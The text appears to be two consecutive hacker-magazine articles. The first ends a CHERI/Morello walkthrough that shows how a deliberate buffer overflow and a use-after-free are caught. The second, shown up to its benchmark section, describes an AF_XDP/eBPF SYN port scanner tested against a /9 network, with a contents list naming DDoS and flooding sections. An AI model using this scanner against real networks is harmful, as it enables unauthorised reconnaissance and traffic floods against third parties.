Before diving straight in, let's think for a moment about what kind of crash we should expect based on our current understanding. As explained above, as long as we keep our inputs less than 16 bytes, we won't run into the same error as with `./stack`. In fact, we should expect the call to `strcpy()` to return without any drama. However, the `strcpy()` isn't without its importance this time around because it will have written to a capability which we will then dereference by calling `func_ptr()` at the end of `main()`. If the memory controller is doing what it's supposed to, then it will have cleared the tag bit from the capability corresponding to `func_ptr` when `strcpy()` overwrites part of it.

Okay, enough hypothesising - let's run this without an argument to see the `func_ptr` capability before it gets overwritten.
root@cheribsd-morello-purecap:~/vuln # ./partial
Calling `func_ptr()` @ 0x1108b1 [rxR,0x100000-0x130c80] (sentry)
inside some_func()
So the `func_ptr` capability has a value of `0x1108b1`, is valid for the bounds `0x100000-0x130c80` and can be used to both read and fetch bytes (the lower-case "rx") as well as read capabilities (the upper-case "R"). Now let's run `partial` again but this time with an argument:
root@cheribsd-morello-purecap:~/vuln # ./partial A
Calling `func_ptr()` @ 0x110041 [rxR,0x100000-0x130c80] (invalid,sentry)
In-address space security exception (core dumped)
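The byte-level effect of that one-character argument can be worked through with a small model of a tagged 16-byte granule. This is a sketch under my own assumptions: the `toy_*` names are hypothetical, the metadata half of the capability is left as zeros, and "any data store clears the tag" is the only rule being modelled.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* One 16-byte capability granule plus its out-of-band tag bit. */
struct toy_granule {
    uint8_t bytes[16];
    bool    tag;
};

/* Store a valid capability whose 64-bit value is `value` (little-endian,
 * as on Aarch64); the metadata half is left as zeros in this model. */
static void toy_store_cap(struct toy_granule *g, uint64_t value) {
    memset(g->bytes, 0, sizeof g->bytes);
    for (int i = 0; i < 8; i++)
        g->bytes[i] = (uint8_t)(value >> (8 * i));
    g->tag = true;
}

/* Any plain data store into the granule clears the tag, no matter how
 * few bytes it touches. */
static void toy_store_data(struct toy_granule *g, size_t off,
                           const void *src, size_t len) {
    assert(off + len <= sizeof g->bytes);
    memcpy(g->bytes + off, src, len);
    g->tag = false;
}

/* Read back the 64-bit value field. */
static uint64_t toy_value(const struct toy_granule *g) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | g->bytes[i];
    return v;
}
```

Storing `0x1108b1` with `toy_store_cap()` and then writing the two bytes of the string "A" (the letter plus its NUL) at offset 0 leaves a value of `0x110041` with the tag cleared, which lines up with the `(invalid,sentry)` output from `./partial A`.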
Aha! Notice how the low two bytes of the value field changed from `0x08b1` to `0x0041` (in little-endian memory order, `b1 08` became `41 00`) - the "A" (followed by a NUL) we passed as an argument successfully overwrote the capability, but the tag bit got cleared in the process. Notice how the `%#p` specifier helpfully adds the word "invalid" to the formatting of the `func_ptr` capability now. If we wanted to, we could overwrite the entirety of the `func_ptr` capability and STILL not be able to prevent the tag bit from being cleared. No matter what we do in this example, modifying the capability using user input forces the capability to be treated as data.

In summary, the CPU once again threw an exception at us, but this time it was ultimately because we tried to dereference the capability in `pcc` (remember - this is the CHERI version of `pc`) after the tag bit had been cleared. We were able to successfully return from `strcpy()` because we didn't overflow the bounds of the capability that was used to write to the `func_ptr` object. However, in doing so, the memory controller cleared the corresponding tag bit for the `func_ptr` capability, meaning that it was no longer valid! When we then tried to call `func_ptr()`, `pcc` still got set to the now invalid capability, but as soon as the CPU tried to fetch an instruction from the address that `pcc` now pointed to, the exception got thrown. Pretty cool, huh?

Hopefully these two examples demonstrate how CHERI can help to mitigate two very common avenues of attack that academics refer to as "spatial memory safety issues". Here, "spatial" refers to the fact that we're modifying memory that we're not supposed to, "beyond the space/region that the program expects".

At this point, it's worth mentioning something that's missing from this picture - if you've been following along at home you might have already noticed it. If you run the second example above a few times *without passing any argument*, you'll see the address of `some_func` printed out a few times.
Notice anything strange? That's right - there's no ASLR on this system. The thought behind this appears to be that because you can't forge capabilities, why does the memory layout need to be randomised at all? Does knowing the virtual memory locations of *anything* help you anymore with regards to exploitation? Are information leaks still a concern (assuming you're only leaking capabilities)?

If you know anything about academics, then you're probably suspecting that labeling something as "spatial memory safety" means that there's another type of memory safety to think about. In our case, we should also consider "temporal memory safety issues". These are vulnerabilities that occur when the contents of memory change at different times in ways that the programmer didn't intend, and therefore the *program* doesn't expect. Think of things like use-after-free, or perhaps even type-confusion. Personally, I'm not a fan of categorising memory corruption issues into these two camps because I feel like there's too much grey area, but we'll proceed with it for now as it's what the CHERI literature uses.

### Use-After-Free

If you've written a UAF exploit or similar in the past, then you'll know that exploits in this realm depend heavily on the allocator due to the objects of interest being on the heap (objects on the stack are typically more "permanent" so are drastically less likely to have their contents switched out from under the program's nose during execution). A CHERI system is no exception and temporal memory protections come from the use of a "CHERI-hardened" allocator [4]. The current research in this field describes an allocator that employs a concept referred to as "quarantining" to protect freed allocations from being reused. The idea of a quarantining allocator is reasonably straightforward: when a heap chunk is freed, it goes into a quarantine list where it cannot be re-allocated.
Later, the quarantine list can be cleaned up by removing the tag bit from all the capabilities in the list before returning them to the pool of free chunks. In my view, I don't quite see why this idea of quarantining should be preferred over zeroing memory as part of the free operation as this would also have the added benefit of removing the tag bit from any capabilities that were contained *within* the allocation (for example, if a struct containing function pointers was allocated on the heap) and therefore preventing legitimate capabilities from possibly being re-used at a later time. Perhaps the reasoning is to do with memory latency again and the cost of zeroing arbitrarily large memory regions during `free()`. Let's see an example of the quarantining allocator in action:
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void* ptr = NULL;
    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);
    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);
    return 0;
}
On a non-CHERI system, we'd typically expect to see the same address printed each time for `ptr`, despite the fact that we've free'd and malloc'd in between the calls to `printf`. However, in our CheriBSD VM, we see:
root@cheribsd-morello-purecap:~/vuln # ./heap1
ptr @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040]
ptr @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080]
Notice how the `ptr` capability changes - in fact the second capability is always 64 bytes after the first. This is because, despite freeing `ptr`, the memory it pointed to has been quarantined. The next time we try to allocate something, we get the next free *non-quarantined* chunk which happens to be immediately after the first chunk that we got. How does any of this affect exploitation? Well, let's try to concoct a very simple use-after-free example to see if and how CHERI complains to us:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char* ptr1 = malloc(64);
    strcpy(ptr1, "CHERI1");
    free(ptr1);
    /* Leave this commented out for now, we'll come back to it afterwards */
    //malloc_revoke();
    char* ptr2 = malloc(64);
    strcpy(ptr2, "CHERI2");
    free(ptr2);
    printf("ptr1 @ %#p => %s\n", ptr1, ptr1);
    printf("ptr2 @ %#p => %s\n", ptr2, ptr2);
    return 0;
}
On a non-CHERI system, the behaviour of the above program depends on the allocator. On my host system, the addresses allocated for both `ptr1` and `ptr2` are the same, but contain junk data by the time `printf` is called. On a different system with a different allocator, the strings `CHERI1` and `CHERI2` might still be present. However, in the CheriBSD VM, we see:
root@cheribsd-morello-purecap:~/vuln # ./heap2
ptr1 @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] => CHERI1
ptr2 @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080] => CHERI2
In particular, notice how `ptr1` and `ptr2` DO NOT have the same value despite `ptr2` being allocated after `ptr1` was freed. This is the quarantining allocator at work again. Notice also that the `CHERI1` and `CHERI2` strings are still in place. This tells us that the call to `free()` *doesn't clear the tag bit from the pointers that are passed to it*. If we now uncomment the call to `malloc_revoke()` between the two allocations, we get a very different result:
root@cheribsd-morello-purecap:~/vuln # ./heap2
In-address space security exception (core dumped)
Uh, oh - something went wrong. Let's take a look in GDB to see what happened.
root@cheribsd-morello-purecap:~/vuln # gdb -q ./heap2 heap2.core
Reading symbols from ./heap2...
[New LWP 100064]
Core was generated by `./heap2'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability tag fault.
#0 strlen (str=0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] (invalid) "CHERI2")
at /home/user/cheri/cheribsd/lib/libc/string/strlen.c:143
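Both runs of `heap2` fit a simple picture of a quarantine plus a revocation sweep. The toy model below is only meant to illustrate that picture: the `toy_*` names are hypothetical, a "capability" is reduced to a chunk index plus a tag, and the allocator remembers a single reference per chunk, whereas a real sweep has to scan memory for every capability that points into quarantined chunks.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_CHUNKS 4

enum toy_state { TOY_FREE, TOY_LIVE, TOY_QUARANTINED };

/* A "capability" here is just a chunk index plus a tag bit. */
struct toy_ptr {
    int  chunk;
    bool tag;
};

struct toy_heap {
    enum toy_state  state[TOY_CHUNKS];
    struct toy_ptr *refs[TOY_CHUNKS];   /* one tracked reference per chunk */
};

/* Hand out the lowest-numbered free chunk and remember where the
 * resulting capability is stored so that a later sweep can find it. */
static bool toy_malloc(struct toy_heap *h, struct toy_ptr *out) {
    for (int i = 0; i < TOY_CHUNKS; i++) {
        if (h->state[i] == TOY_FREE) {
            h->state[i] = TOY_LIVE;
            h->refs[i] = out;
            out->chunk = i;
            out->tag = true;
            return true;
        }
    }
    return false;
}

/* free(): the chunk is parked in quarantine; the caller's capability
 * keeps its tag, so stale accesses still "work". */
static void toy_free(struct toy_heap *h, const struct toy_ptr *p) {
    assert(p->tag && h->state[p->chunk] == TOY_LIVE);
    h->state[p->chunk] = TOY_QUARANTINED;
}

/* Revocation sweep: untag every reference into quarantined chunks, then
 * return those chunks to the free pool. */
static void toy_revoke(struct toy_heap *h) {
    for (int i = 0; i < TOY_CHUNKS; i++) {
        if (h->state[i] == TOY_QUARANTINED) {
            if (h->refs[i] != NULL)
                h->refs[i]->tag = false;
            h->refs[i] = NULL;
            h->state[i] = TOY_FREE;
        }
    }
}
```

Without `toy_revoke()`, a malloc/free/malloc sequence hands out chunk 0 and then chunk 1, and the first pointer stays tagged. With `toy_revoke()` between the free and the second malloc, the second allocation reuses chunk 0 and the first pointer comes back untagged, which matches GDB showing `ptr1` as `(invalid)` while pointing at "CHERI2".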
So what did that `malloc_revoke()` function do? This is a function provided by the CHERI SDK that forces a cleanup of the quarantine list in the allocator. This means that the capability corresponding to `ptr1` has its tag bit cleared. From the CHERI man pages [5], `malloc_revoke()` "triggers a full flush of the quarantine and scan of memory to ensure that all references to memory previously quarantined by free(3) or realloc(3) are revoked upon successful return". Ultimately, we can see that `strlen()` was called (presumably by `printf()` due to the `%s` format specifier) with an invalid capability.

## Where next?

I hope you've enjoyed this figurative toe-dip into CHERI both as a concept, and also after getting our hands dirty with some solid examples. Personally, I think the platform has some solid design ideas that will certainly make classic exploitation techniques harder. I'm hesitant to say that any of those existing techniques have been rendered obsolete because, as far as I'm aware, CHERI is yet to be battle tested as a security mechanism on a target that's of significant interest to exploit developers, like a flagship smartphone or a games console.

If you'd like to dive deeper into CHERI, then I recommend checking out the Morello documentation more closely [2]. There's also the "CHERI Exercises" repo on GitHub [6] by the CHERI team at Cambridge University which highlights more scenarios where CHERI introduces new complications for exploit writers. This article should give you a solid foundation to be able to tackle those exercises.

Remember that CHERI doesn't stop at Morello with Aarch64! CHERI specifications also exist for MIPS and RISC-V, with x86_64 in the works too. In particular, there is the CHERIoT (CHERI Internet-Of-Things) project [7] which uses the RISC-V CHERI extension to power an IoT platform. This project makes extensive use of the compartmentalisation feature of CHERI that I briefly mentioned earlier in the article.
This is a method of process isolation using sealed capabilities without having to separate processes into different memory spaces.

It's also worth taking a look at the output of `./cheribuild.py --list-targets` - there are already build definitions for things like Apache, Nginx, KDE Plasma, Wayland, FFmpeg, and even DOOM!

## Closing Thoughts

First of all, if you've made it this far - thank you! I hope you found this read worth your time and that you learnt something - even if it was just to scratch that itch to understand a little better what this CHERI thing is all about. That's certainly why I chose to take a look at it.

If CHERI takes off in the consumer space in the future, I think bug hunters and xdevs alike will enjoy the new challenges posed by it. And if it doesn't take off, then it will still remain an interesting experiment that we can continue to play with in VMs.

Obligatory shoutouts go to netspooky, dnoiz, hermit, gren, srsns, bane, remy, computeruser, zeta, chill, buses, rqu, iximeow, ilya, kyo and The Binary Golf Association (you should go play Binary Golf [8]).

## Links and References
|=-----------------------------------------------------------------------=|
|=-------------=[ 5 - High-Performance Network Scanning ]=---------------=|
|=-------------------------=[ With AF_XDP ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ c3l3si4n ]=------------------------------=|
|=-----------------------------------------------------------------------=|

-- Table of contents

0 - Introduction
1 - The Slow Path: Traditional Scanning Methods
    1.0 - Per-Connection Syscall Overhead
    1.1 - Inefficient Packet Filtering with AF_PACKET
2 - Kernel Bypass and Fastpath Architectures
    2.0 - Full Kernel Bypass: DPDK
    2.1 - The Kernel Fastpath: XDP
    2.2 - XDP Internals: Actions and Modes
    2.3 - AF_XDP: A Zero-Copy Bridge to Userspace
3 - Building the Scanner
    3.0 - Core Design
    3.1 - The eBPF Filter Component
    3.2 - The Userspace Application
        3.2.0 - Setup and Initialization
        3.2.1 - The Packet Transmission Loop
        3.2.2 - The Packet Reception Loop
4 - Performance Analysis
    4.0 - A Note on Benchmarking
    4.1 - Head-to-Head: AF_XDP vs. masscan
5 - Extending the AF_XDP Framework
    5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS
    5.1 - Stateless UDP Fuzzing and DDoS Amplification
    5.2 - High-Entropy SYN Flooding
6 - Caveats and Considerations
7 - Conclusion
8 - References
9 - Source Code

--[ 0 - Introduction

The network scanner has always been a fundamental tool in my arsenal. As network interface speeds have increased, I found my tools were constrained by the overhead of the operating system's kernel network stack. This has become a significant bottleneck when doing internet-scale scans. In this article, I describe the method I used to build a high-performance port scanner using the Linux kernel's eBPF and AF_XDP subsystems.
This approach creates a kernel fastpath that bypasses the traditional network stack, allowing my application to interact more directly with the network driver for line-rate filtering and zero-copy data transfer.

--[ 1 - The Slow Path: Traditional Scanning Methods

---[ 1.0 - Per-Connection Syscall Overhead

My work began by analyzing the conventional port scanning method, which uses the connect() syscall. For each port, the application creates a socket, initiates a TCP handshake, and waits for the kernel to report the outcome. Every socket() and connect() call is a context switch into the kernel, consuming CPU cycles and introducing significant latency, making it impractical for my purposes.

---[ 1.1 - Inefficient Packet Filtering with AF_PACKET

I then examined raw sockets (AF_PACKET), which allow a userspace application to receive raw link-layer frames, bypassing the kernel's high-level network stack. While this is an improvement for SYN scanning, it does not provide the performance of a true kernel bypass. Packets are still delivered via the standard kernel data path, which involves overhead from context switches and memory copies for every packet received by the interface. This inherent slowness compared to a direct kernel bypass was unacceptable for my goals.

--[ 2 - Kernel Bypass and Fastpath Architectures

---[ 2.0 - Full Kernel Bypass: DPDK

To achieve maximum performance, some frameworks like the Data Plane Development Kit (DPDK) implement a full kernel bypass. They use custom Poll-Mode Drivers (PMDs) that unbind a network interface from the kernel's control, giving a userspace application exclusive access. While this is very fast, it comes with drawbacks: it requires custom drivers, is invasive to the system, and often requires pinning a CPU core at 100% utilization for polling.

---[ 2.1 - The Kernel Fastpath: XDP

It is important to clarify that AF_XDP is not a kernel bypass in the same vein as DPDK.
It is a highly efficient kernel fastpath that works in cooperation with existing kernel drivers. My XDP program is an eBPF program attached to a low-level hook in the network driver, triggered for every incoming packet at the earliest possible point.

---[ 2.2 - XDP Internals: Actions and Modes

Once my eBPF program is running at the XDP hook, it can inspect the raw packet data and return a verdict that determines the packet's fate. The primary actions are XDP_PASS, XDP_DROP, XDP_TX, and XDP_REDIRECT. The XDP_REDIRECT action is what allows my program to forward a packet to an AF_XDP socket in userspace.

You can load XDP programs in three modes, which differ in performance:

- Native XDP: The program is loaded directly by a supported network card driver, providing the highest performance.
- Offloaded XDP: The program is offloaded to and executed directly on the NIC hardware, requiring specific SmartNICs.
- Generic XDP: The program is hooked later in the kernel's network path, after an sk_buff has been allocated. This mode serves as a fallback for testing or for use on unsupported hardware.

---[ 2.3 - AF_XDP: A Zero-Copy Bridge to Userspace

AF_XDP is the kernel feature I used to create a high-performance data path between my XDP program and my userspace application. This is achieved through a shared memory region called a UMEM, which I allocate in userspace and register with the kernel. This UMEM is where all my packet data lives.

The communication is orchestrated by a set of four single-producer, single-consumer rings:

- RX Ring: The kernel places descriptors here for incoming packets that my XDP program has redirected.
- TX Ring: I place descriptors here for packets I want to send. The kernel picks them up and transmits them.
- FILL Ring: I place descriptors for empty UMEM frames on this ring to give the buffers to the kernel for receiving new packets.
- COMPLETION Ring: After the kernel has sent a packet from my TX ring, it places the descriptor on this ring to signal that the UMEM frame can be reused.

This architecture allows me to shuttle packets back and forth with the NIC driver while minimizing memory copies and context switches.

--[ 3 - Building the Scanner

---[ 3.0 - Core Design

My demonstration scanner is composed of two primary components: an eBPF+XDP filter in C and a userspace packet sender in Go. The core design separates the logic for efficiency. My eBPF filter is loaded onto the NIC to inspect incoming TCP packets and redirect only the replies relevant to the scanner. My Go application then manages the AF_XDP socket, populates the FILL ring, sends SYN packets via the TX ring, and processes the replies from the RX ring. This division of labor places the performance-critical filtering in the kernel, while I handle the more complex state and I/O logic in userspace.

---[ 3.1 - The eBPF Filter Component

My eBPF code is designed for efficiency and simplicity.
// file: bpf/xdp_filter.c
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

// This MUST match the -srcport flag in my Go program.
#define FILTER_PORT 54321

// Map to hold the file descriptor of my AF_XDP socket.
struct {
    __uint(type, BPF_MAP_TYPE_XSKMAP);
    __uint(key_size, sizeof(__u32));
    __uint(value_size, sizeof(__u32));
    __uint(max_entries, 1);
} xsks_map SEC(".maps");

SEC("xdp")
int xdp_port_filter(struct xdp_md *ctx) {
    void *data_end = (void *)(long)ctx->data_end;
    void *data = (void *)(long)ctx->data;
    struct ethhdr *eth = data;
    struct iphdr *ip = data + sizeof(*eth);
    struct tcphdr *tcp;

    // One bounds check covers the Ethernet and the fixed IPv4 header.
    if ((void *)ip + sizeof(*ip) > data_end)
        return XDP_PASS;
    // Only IPv4/TCP is of interest; everything else goes to the stack.
    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;
    // The IPv4 header length is variable (ihl counts 32-bit words).
    tcp = (void *)ip + ip->ihl * 4;
    if ((void *)tcp + sizeof(*tcp) > data_end)
        return XDP_PASS;
    // Replies to the scanner arrive on its source port: redirect those.
    if (tcp->dest == bpf_htons(FILTER_PORT))
        return bpf_redirect_map(&xsks_map, 0, 0);
    return XDP_PASS;
}
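The header walk in the filter can also be exercised outside the kernel, which is handy for checking offsets against hand-built frames. The following is a userspace sketch of the same decision procedure, not the eBPF program itself: the `toy_*` names are hypothetical, the headers are read by byte offset instead of through kernel structs, and the EtherType and minimum-IHL checks are defensive choices of this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum toy_verdict { TOY_PASS, TOY_REDIRECT };

#define TOY_ETH_HLEN     14
#define TOY_ETH_P_IP     0x0800
#define TOY_IPPROTO_TCP  6
#define TOY_TCP_MIN_HLEN 20

/* Read a big-endian (network order) 16-bit field. */
static uint16_t toy_be16(const uint8_t *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Same decision procedure as the XDP program, applied to a byte buffer:
 * every header is bounds-checked before any of its fields are read. */
static enum toy_verdict toy_filter(const uint8_t *frame, size_t len,
                                   uint16_t filter_port) {
    assert(frame != NULL);
    if (len < TOY_ETH_HLEN + 20)                      /* Ethernet + min IPv4 */
        return TOY_PASS;
    if (toy_be16(frame + 12) != TOY_ETH_P_IP)         /* EtherType */
        return TOY_PASS;

    const uint8_t *ip = frame + TOY_ETH_HLEN;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;          /* header length, bytes */
    if (ihl < 20 || ip[9] != TOY_IPPROTO_TCP)
        return TOY_PASS;
    if (len < TOY_ETH_HLEN + ihl + TOY_TCP_MIN_HLEN)  /* room for TCP header */
        return TOY_PASS;

    const uint8_t *tcp = ip + ihl;
    return toy_be16(tcp + 2) == filter_port ? TOY_REDIRECT : TOY_PASS;
}
```

A 54-byte IPv4/TCP frame whose destination port is 54321 comes back as `TOY_REDIRECT`; truncating the same frame, or changing its protocol to UDP, falls through to `TOY_PASS`.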
---[ 3.2 - The Userspace Application

The PoC Go application orchestrates the entire scanning process.

----[ 3.2.0 - Setup and Initialization

Before any packets fly, a sequence of setup steps must be performed. First, I parse the arguments for the interface, targets, and ports. Then, I load my compiled xdp_filter.o program and attach it to the specified interface. The core setup involves creating the AF_XDP socket, then allocating and registering the UMEM via the XDP_UMEM_REG setsockopt call. Following that, I set the sizes of the four rings and mmap them into my application's address space. With the socket ready, I register its file descriptor into the eBPF map so the kernel knows where to redirect packets. Finally, since my tool operates at Layer 2, I must manually resolve the gateway's MAC address via ARP.

----[ 3.2.1 - The Packet Transmission Loop

Instead of sending packets one by one, we can send packets in large batches to amortize the cost of syscalls.
// file: cmd/portscanner/main.go (conceptual)

// A template packet is pre-crafted to avoid building from scratch every time.
packer, _ := newSynPacker(srcMAC, gatewayMAC, srcIP, srcPort)

// Ensure COMPLETION ring is checked to reclaim UMEM frames for reuse.
check_completion_ring_and_refill_umem()

for outstandingCount > 0 {
    numFree := xsk.NumFreeTxSlots()
    if numFree > 0 {
        descs := xsk.GetDescs(min(numFree, BATCH_SIZE), false)
        for i := range descs {
            target := getNextTarget()
            frame := xsk.GetFrame(descs[i]) // Pointer to shared memory
            packer.pack(frame, target.ip, target.port, randomSeq())
            descs[i].Len = pktLen
        }
        xsk.Transmit(descs)
    }
}
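The free-slot accounting that a batched transmit loop relies on can be sketched as a single-producer/single-consumer ring with free-running indices. This is a single-threaded toy with hypothetical `toy_*` names: the real AF_XDP rings live in memory shared with the kernel and need memory barriers around the index updates, which are left out here.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define TOY_RING_SIZE 8u                 /* must be a power of two */
#define TOY_RING_MASK (TOY_RING_SIZE - 1u)

/* Descriptor: where a frame lives inside the shared buffer, and its length. */
struct toy_desc {
    uint64_t addr;
    uint32_t len;
};

/* Free-running indices: they only ever increase and wrap naturally at
 * 2^32; masking them selects the slot. */
struct toy_ring {
    uint32_t producer;
    uint32_t consumer;
    struct toy_desc slots[TOY_RING_SIZE];
};

static uint32_t toy_ring_used(const struct toy_ring *r) {
    return r->producer - r->consumer;
}

static uint32_t toy_ring_free(const struct toy_ring *r) {
    return TOY_RING_SIZE - toy_ring_used(r);
}

/* Producer side: queue up to n descriptors, return how many were accepted. */
static uint32_t toy_ring_push(struct toy_ring *r, const struct toy_desc *d,
                              uint32_t n) {
    assert((TOY_RING_SIZE & TOY_RING_MASK) == 0);
    uint32_t room = toy_ring_free(r);
    if (n > room)
        n = room;
    for (uint32_t i = 0; i < n; i++)
        r->slots[(r->producer + i) & TOY_RING_MASK] = d[i];
    r->producer += n;   /* publish the whole batch at once */
    return n;
}

/* Consumer side: take one descriptor if any is pending. */
static bool toy_ring_pop(struct toy_ring *r, struct toy_desc *out) {
    if (toy_ring_used(r) == 0)
        return false;
    *out = r->slots[r->consumer & TOY_RING_MASK];
    r->consumer++;
    return true;
}
```

Pushing a batch of 10 descriptors into the empty 8-slot ring accepts 8 of them; after the consumer pops one, exactly one more fits. Publishing the producer index once per batch is the part that makes batching cheap, since the other side only has to observe a single update.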
----[ 3.2.2 - The Packet Reception Loop My receive loop, running in a dedicated goroutine, can be simple because the eBPF program has already handled the filtering.
// file: cmd/portscanner/main.go (conceptual)

// Pre-populate the FILL ring with available UMEM frames.
populate_fill_ring()

for {
    numRx, _, err := xsk.Poll(10) // 10ms timeout
    if err != nil {
        continue // conceptual: real code should log or abort on persistent errors
    }
    if numRx > 0 {
        // Fetch the descriptors of the frames that Poll reported as received.
        rxDescs := xsk.Receive(numRx)
        for _, desc := range rxDescs {
            frame := xsk.GetFrame(desc)
            ip, port, status := processPacket(frame)
            if status == "open" || status == "closed" {
                updateStatus(ip, port, status)
            }
        }
        // Return the now-empty frame descriptors to the kernel's FILL ring
        xsk.Fill(rxDescs)
    }
}
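The body of `processPacket()` is not shown, so here is one way the classification step could look, written in C to match the filter. It is a guess at the logic, with hypothetical `toy_*` names: it assumes the frame has already been filtered down to IPv4/TCP, treats SYN+ACK as "open" and any RST as "closed", and reports everything else as "unknown".

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TOY_TCP_SYN 0x02
#define TOY_TCP_RST 0x04
#define TOY_TCP_ACK 0x10

/* Classify a reply to a SYN probe from the TCP flags byte. */
static const char *toy_classify(uint8_t tcp_flags) {
    if (tcp_flags & TOY_TCP_RST)
        return "closed";
    if ((tcp_flags & (TOY_TCP_SYN | TOY_TCP_ACK)) == (TOY_TCP_SYN | TOY_TCP_ACK))
        return "open";
    return "unknown";
}

/* Pull the responder's address and port out of an Ethernet/IPv4/TCP frame
 * and classify it. The outputs are written only when the frame is long
 * enough to contain a full TCP header. */
static const char *toy_process_packet(const uint8_t *frame, size_t len,
                                      uint32_t *src_ip, uint16_t *src_port) {
    assert(frame != NULL && src_ip != NULL && src_port != NULL);
    if (len < 14 + 20)
        return "unknown";
    const uint8_t *ip = frame + 14;                 /* skip Ethernet header */
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if (ihl < 20 || len < 14 + ihl + 20)
        return "unknown";
    const uint8_t *tcp = ip + ihl;
    *src_ip = ((uint32_t)ip[12] << 24) | ((uint32_t)ip[13] << 16)
            | ((uint32_t)ip[14] << 8) | (uint32_t)ip[15];
    *src_port = (uint16_t)((tcp[0] << 8) | tcp[1]);
    return toy_classify(tcp[13]);                   /* flags byte */
}
```

The source address and port of the reply identify the probed target, which is why they are what gets handed to the status update. The strings are compared with `strcmp()` in C, where the Go version can use `==`.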
--[ 4 - Performance Analysis

---[ 4.0 - A Note on Benchmarking

To validate this architecture, a performance comparison is necessary. I chose masscan as the benchmark, as it represents the gold standard for high-speed, internet-scale scanning.

It must be stated that masscan is a mature, highly-tuned project. It has years of optimization in its custom networking code and supports advanced kernel-bypass techniques such as PF_RING with DNA drivers. This driver DMAs packets directly from user-mode memory to the network driver with zero kernel involvement, allowing it to transmit at the maximum rate the hardware allows.

Therefore, the goal here is not to "beat" masscan, but to determine if an AF_XDP-based tool, even as a proof-of-concept, can be competitive and where its architectural strengths lie.

The benchmark consists of two scenarios: a high-density scan against a single host (45.33.32.156) on all 65,535 ports, and a wide-range scan against a /9 network (2^23, about 8.4 million IPs) on a single port.

---[ 4.1 - Head-to-Head: AF_XDP vs. masscan

A critical factor in masscan's design is a built-in 10-second delay at the end of each scan to receive late-arriving packets.

--------------------------------------------------------------------------
rate: 0.00-kpps, 100.00% done, waiting 10-secs, found=3
--------------------------------------------------------------------------

When this delay is factored out to compare raw transmission times, the results are revealing. For the wide-range /9 scan, masscan clocked in at 69.2 seconds total, meaning its active scanning time was only ~59.2 seconds.

--------------------------------------------------------------------------
real 1m9.174s
--------------------------------------------------------------------------

My XDP scanner completed the same task in 68.3 seconds. In this scenario, where the bottleneck is spread across millions of IPs, masscan's years of optimization give it a clear edge.
However, the high-density scan against a single host tells a different
story. Here, masscan's active scanning time was ~2 seconds (12 seconds of
total time minus the 10-second delay).

--------------------------------------------------------------------------
real 0m12.163s
--------------------------------------------------------------------------

My AF_XDP scanner finished in just ~1.3 seconds.
~

The victory for the AF_XDP scanner here was not just in speed, but also in
accuracy. My scanner consistently identified all four open ports on the
target in every run:

--------------------------------------------------------------------------
OPEN: 45.33.32.156:22
OPEN: 45.33.32.156:9929
OPEN: 45.33.32.156:80
OPEN: 45.33.32.156:31337
--------------------------------------------------------------------------

In contrast, masscan's high rate caused it to miss ports, finding a
different number of open ports on different runs:

--------------------------------------------------------------------------
1st scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=3
2nd scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=2
--------------------------------------------------------------------------

This outcome directly validates the AF_XDP architecture. The performance
gains are a result of several combined optimizations. The kernel-level
eBPF filter drops unwanted traffic at the earliest possible point. The
zero-copy UMEM and batched ring operations nearly eliminate syscall
overhead. This is why the PoC excels in the high-density test: the
per-packet overhead is so low that it can saturate a single target more
effectively and reliably than a tool tuned for internet-wide distribution.

While the XDP scanner is just a proof-of-concept, it shows that with
further development, this architecture holds potential.

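As a rough sanity check on the timings above, the active scanning times can
be turned into average probe rates. The sketch below assumes exactly one
probe per target and no retransmissions (neither tool's retry behaviour is
stated in the text), and the names `effective_pps`, `RUNS` and `summarize`
are made up for this illustration. Under those assumptions the /9 scan
works out to roughly 142 kpps for masscan versus 123 kpps for the PoC, and
the single-host scan to about 33 kpps versus 50 kpps.

```python
# Back-of-the-envelope probe rates from the timings quoted in 4.1.
# Assumption: one probe per target, no retransmissions.

def effective_pps(probes: int, seconds: float) -> float:
    """Average probes per second over the active scanning window."""
    return probes / seconds

SLASH9_HOSTS = 2 ** (32 - 9)   # 8,388,608 addresses in a /9
ALL_PORTS = 65535              # ports 1-65535 on a single host

# (scenario, tool) -> (probes sent, active seconds taken from the text)
RUNS = {
    ("/9, one port", "masscan"): (SLASH9_HOSTS, 59.2),
    ("/9, one port", "AF_XDP PoC"): (SLASH9_HOSTS, 68.3),
    ("one host, all ports", "masscan"): (ALL_PORTS, 2.0),
    ("one host, all ports", "AF_XDP PoC"): (ALL_PORTS, 1.3),
}

def summarize(runs=RUNS):
    """Map each (scenario, tool) pair to its average probe rate."""
    return {key: effective_pps(*val) for key, val in runs.items()}

if __name__ == "__main__":
    for (scenario, tool), pps in summarize().items():
        print(f"{scenario:22s} {tool:12s} {pps / 1000:8.1f} kpps")
```

These are averages over the whole run, so they say nothing about burst
rates or about how many probes were actually answered.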
